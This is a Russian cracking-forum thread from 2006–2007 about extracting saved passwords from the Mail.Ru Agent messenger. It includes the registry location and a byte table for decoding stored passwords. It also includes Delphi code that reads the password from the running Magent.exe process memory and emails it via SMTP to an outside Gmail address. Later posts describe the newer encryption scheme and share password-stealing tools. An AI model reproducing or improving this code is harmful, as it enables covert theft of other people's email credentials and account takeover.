Сейчас на форуме: vsv1, r0lka, -Sanchez-, testrev1337, johnniewalker (+3 невидимых) |
eXeL@B —› Крэки, обсуждения —› Mail.Ru Agent -выташить пароли |
<< . 1 . 2 . 3 . 4 . 5 . 6 . 7 . >> |
Посл.ответ | Сообщение |
|
Создано: 24 ноября 2006 06:08 · Личное сообщение · #1 Покопался тут в реестре ,нашёл где хранятся пароли. Создаю нового пользователя abc@mail.ru,пароль устанавливаю 12345 в реестре смотрю HKEY_CURRENT_USER / Software / Mail.Ru / Agent /mra_logins. Смотрю двоичный параметр abc@mail.ru , значение 05 00 00 00 9b 98 99 9e 9f. 05-это длина пароля,потом 00 00 00 (вводил различные пароли всёравно было 00 00 00), дальше идёт сам пароль(не в открытом виде конечно) 9b 98 99 9e 9f. Так вот мне интересно у всех ли пароли кодируются подобным образом,приведу некоторые значения : цифры: буквы: 0 -9a A -eb 1 -9b B -e8 2 -98 C -e9 3 -99 D -ee 4 -9e E -ef 5 -9f F -ec 6 -9c 7 -9d 8 -92 9 -93 Если кодировка одинаковая то можно сделать программу ,которая будет читать пароли к мылу из реестра и показывать её уже в нормальном виде. ----- Что один человек сделал , другой всегда сломать может... |
|
Создано: 15 мая 2007 20:21 · Личное сообщение · #2 |
|
Создано: 16 мая 2007 12:20 · Личное сообщение · #3 |
|
Создано: 17 мая 2007 11:47 · Личное сообщение · #4 |
|
Создано: 18 мая 2007 01:47 · Личное сообщение · #5 |
|
Создано: 19 мая 2007 17:49 · Личное сообщение · #6 Я вот тут тоже что то написал (кодер я только начинающий:s12. Только это что то не работает почему то... Может кто поможет из опытных... uses Windows, Messages, smtpsend, classes, SysUtils, IdGlobal; var Bytesread : DWORD; Olddata : array[0..16] of char; send: TStringList; pass: string; i: integer; SeDebugNameValue:Int64; tkp:TOKEN_PRIVILEGES; ReturnLength:Cardinal; hToken ,hProcess,handle :THandle; begin if not OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken ) then exit; if not LookupPrivilegeValue( nil, 'SeDebugPrivilege', SeDebugNameValue ) then begin CloseHandle(hToken); exit; end; tkp.PrivilegeCount:= 1; tkp.Privileges[0].Luid := SeDebugNameValue; tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken,false,tkp,SizeOf(tkp),tkp,ReturnLength); if GetLastError() <> ERROR_SUCCESS then exit; hProcess:=OpenProcess(PROCESS_VM_OPERATION or PROCESS_VM_READ,false, dword(StrToCard('Magent.exe'))); begin ReadProcessMemory(hProcess,Pointer($647445),@olddata,16,bytesread); end; for i:=1 to 16 do begin pass:=pass+olddata[i]; end; send:= TStringList.Create; send.Insert(0, pass); smtpsend.SendToEx('xxxx@mail.ru', 'xxxxxx@gmail.com', 'subj', 'smtp.mail.ru', send, 'login', 'pass'); end. |
|
Создано: 19 мая 2007 18:18 · Личное сообщение · #7 |
|
Создано: 19 мая 2007 20:32 · Личное сообщение · #8 |
|
Создано: 22 мая 2007 11:55 · Личное сообщение · #9 4.9 агент вышел. Пароль теперь подругому шифруется, но в памяти он виден . И история шифруется подругому: {\rtf1\ansi\ansicpg1251\deff0\deflang1049{\fonttbl{\f0\fnil\fcharset20 4 Georgia;}} {\colortbl ;\red255\green0\blue0;} \viewkind4\uc1\pard\cf1\b\i\f0\fs27'e4'e0'e9 'f4'ee'f2'ee 'f2'e2'ee'e8'f5 'e1'eb'e8'e7'ed'e5'f6'ee'e2?\par } Будто RTF |
|
Создано: 22 мая 2007 11:57 · Личное сообщение · #10 |
|
Создано: 23 мая 2007 17:44 · Личное сообщение · #11 |
|
Создано: 24 мая 2007 07:59 · Личное сообщение · #12 |
|
Создано: 24 мая 2007 09:28 · Личное сообщение · #13 _baz88ka пишет: история шифруется подругому: {\rtf1\ansi\ansicpg1251\deff0\deflang1049{\fonttbl{\f0\fnil\fcharset20 4 Georgia;}} {\colortbl ;\red255\green0\blue0;} \viewkind4\uc1\pard\cf1\b\i\f0\fs27'e4'e0'e9 'f4'ee'f2'ee 'f2'e2'ee'e8'f5 'e1'eb'e8'e7'ed'e5'f6'ee'e2?\par } Будто RTF Так и есть теперь они RTF кодируются.. http://ru.wikipedia.org/wiki/Rtf http://ru.wikipedia.org/wiki/Rtf ----- Что один человек сделал , другой всегда сломать может... |
|
Создано: 02 июня 2007 16:20 · Личное сообщение · #14 |
|
Создано: 04 июня 2007 15:04 · Личное сообщение · #15 |
|
Создано: 04 июня 2007 15:26 · Личное сообщение · #16 |
|
Создано: 04 июня 2007 18:09 · Личное сообщение · #17 |
|
Создано: 05 июня 2007 20:43 · Личное сообщение · #18 |
|
Создано: 05 июня 2007 22:58 · Поправил: Isaev · Личное сообщение · #19 |
|
Создано: 06 июня 2007 00:07 · Личное сообщение · #20 Поддерживает все эти версии: [Delphi: 211Kb] fe63_05.06.2007_CRACKLAB.rU.tgz - MAgent Pass.exe ----- z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh |
|
Создано: 06 июня 2007 09:47 · Личное сообщение · #21 |
|
Создано: 06 июня 2007 19:04 · Поправил: Isaev · Личное сообщение · #22 |
|
Создано: 06 июня 2007 23:39 · Поправил: Isaev · Личное сообщение · #23 WolfHunter пишет: про то как вычисляется magic_byte пожалуй помолчу А как он вычисляется? У меня не одна из версий его туда (в "Software\Mail.Ru\Agent" [ID]) не пишет и нормально работает (только без него пасс в реестре в открытом виде) (все версии без инсталлятора) может его инсталлятор прописывает... А 4.9 ID вообще не пользует ----- z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh |
|
Создано: 07 июня 2007 18:36 · Поправил: MACKLIA · Личное сообщение · #24 |
|
Создано: 08 июня 2007 21:49 · Поправил: Isaev · Личное сообщение · #25 MACKLIA пишет: кто знаит как отзовись Ну для начала нужно полюбому тянуть эти 2 таблицы (см. аттач) Потом читается файл C:\Documents and Settings\--UserName--\Application Data\Mra\Update\ver.txt (это типа MagicID) [кто прочитает при запущеном агенте +1] нехитро накладывается на эти 2 таблицы... А дальше всё просто... ----- z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh |
|
Создано: 09 июня 2007 02:14 · Личное сообщение · #26 файлы не прикрепляются при правке сообщения 60ca_08.06.2007_CRACKLAB.rU.tgz - Table.exe ----- z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh |
|
Создано: 10 июня 2007 01:49 · Личное сообщение · #27 А вот собственно и ОН Но работает только при выключеном агенте... Помогите обойти блокировку файла. 57cb_09.06.2007_CRACKLAB.rU.tgz - Pass49.exe ----- z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh |
|
Создано: 10 июня 2007 14:52 · Личное сообщение · #28 brok пишет: makВыложи пожалуйста искодники твоей программы. Очень нада. Vot =) , tolko tam nemnogo lischnego est , no rasberesa sto k chemu =))) Isaev пишет: А вот собственно и ОН Но работает только при выключеном агенте... Помогите обойти блокировку файла. 57cb_09.06.2007_CRACKLAB.rU.tgz - Pass49.exe Kod v studiu PLEASE =)))))))))))) 6df8_10.06.2007_CRACKLAB.rU.tgz - MailAgent.rar ----- RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube |
|
Создано: 10 июня 2007 15:42 · Личное сообщение · #29 Или аффтар ламер или я начинаю в асме разбираться... mak пишет: Kod v studiu PLEASE =)))))))))))) ногами не бить, если кто оптимизмрует скиньте, буду учиться c9ba_10.06.2007_CRACKLAB.rU.tgz - Pass49.rar ----- z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh |
|
Создано: 10 июня 2007 16:34 · Личное сообщение · #30 Isaev пишет: Или аффтар ламер или я начинаю в асме разбираться... Stranno =)) skolko sigu na forumah , obasatelno nado obosrat!!! A novechkam voobse sopa! Ne pomogaut a obseraut ili v google posilut ili ese kuda ))))) Eh tovarish !!! Nu to sto nachal rasbiratsa eto konechno ! =)) A dla teba ya budu PROSTO Lamer ! Narusaa tradisii Skasu tebe SPASIBO ! ----- RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube |
|
Создано: 10 июня 2007 17:00 · Поправил: Isaev · Личное сообщение · #31 mak, nu ty daesch!!! Da ja ne pro tebja a pro afftara agenta (S chego by ja wdrug nachal tebja obsirat'??? Ty chto powod dawal???) Dazhe obidno, chto obo mne tak podumali Swoih uwazhaem i dawaj fludit' w lichke Sorry za flud Прям расстроил ты меня... пойду пивка попью... ----- z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh |
<< . 1 . 2 . 3 . 4 . 5 . 6 . 7 . >> |
eXeL@B —› Крэки, обсуждения —› Mail.Ru Agent -выташить пароли |
Эта тема закрыта. Ответы больше не принимаются. |